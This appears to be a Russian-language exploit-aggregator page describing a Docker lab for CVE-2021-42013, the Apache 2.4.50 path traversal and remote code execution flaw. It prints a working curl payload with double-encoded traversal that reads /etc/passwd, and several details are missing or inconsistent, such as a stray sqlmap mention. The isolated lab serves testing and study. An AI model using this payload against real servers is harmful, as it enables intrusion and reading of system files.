Skip to content
cve-2021-42013

cve-2021-42013

Sploitus September 15, 2026

##

Этот проект направлен на докеризацию конкретной уязвимости с помощью Docker. Цель — создать изолированную среду, в которой уязвимость можно безопасно эксплуатировать и тестировать.

Apache HTTP Server 2.4.50 - удалённое выполнение кода && обход пути

Для запуска этого проекта на вашей машине должны быть установлены:

После установки необходимых компонентов вы можете склонировать этот Git-репозиторий на свою машину:

git clone

Находясь в каталоге, выполните команду ниже, чтобы развернуть уязвимую среду:

Затем перейдите к приложению по адресу Если всё прошло успешно, вы должны увидеть сообщение "It works"

Выполнение этого payload с помощью `curl`, приведённого ниже, показывает, что цель уязвима. Скрипт сгенерирует соответствующую команду sqlmap для эксплуатации уязвимости

curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

Этот payload позволяет напрямую получать информацию о пользователе в системе без согласия пользователя.

После активации модулей cgi или cgid на сервере данная уязвимость позволит атакующему выполнять произвольные команды

Extracted Entities

Attack Types (1)

CWE Weaknesses (1)

Platforms (1)

Tools (2)